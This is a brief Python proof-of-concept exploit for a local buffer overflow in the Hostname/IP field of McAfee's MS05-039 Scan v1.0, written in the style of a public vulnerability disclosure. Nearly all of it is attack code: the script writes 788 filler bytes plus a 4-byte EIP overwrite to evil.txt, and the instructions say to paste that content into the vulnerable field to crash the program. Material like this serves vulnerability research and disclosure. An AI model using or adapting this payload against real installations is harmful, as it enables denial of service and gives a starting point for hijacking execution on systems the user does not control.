#!/usr/bin/python # Exploit Title : MS05-039 Scan v1.0 Hostname/IP Field Local BoF PoC # Discovery by : Anurag Srivastava # Email : anurag.srivastava@pyramidcyber.com # Discovery Date : 18/08/2017 # Software Link : https://www.mcafee.com/in/downloads/free-tools/ms05-039-scan.aspx # Tested Version : 1.0 # Vulnerability Type : Denial of Service (DoS) Local # Tested on OS : Windows 10 Home x64 # Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press -> ########################################################################################## # -----------------------------------NOTES----------------------------------------------# ########################################################################################## buffer = "A"*788 eip = "B"*4 f = open("evil.txt", "wb") f.write(buffer+eip) f.close()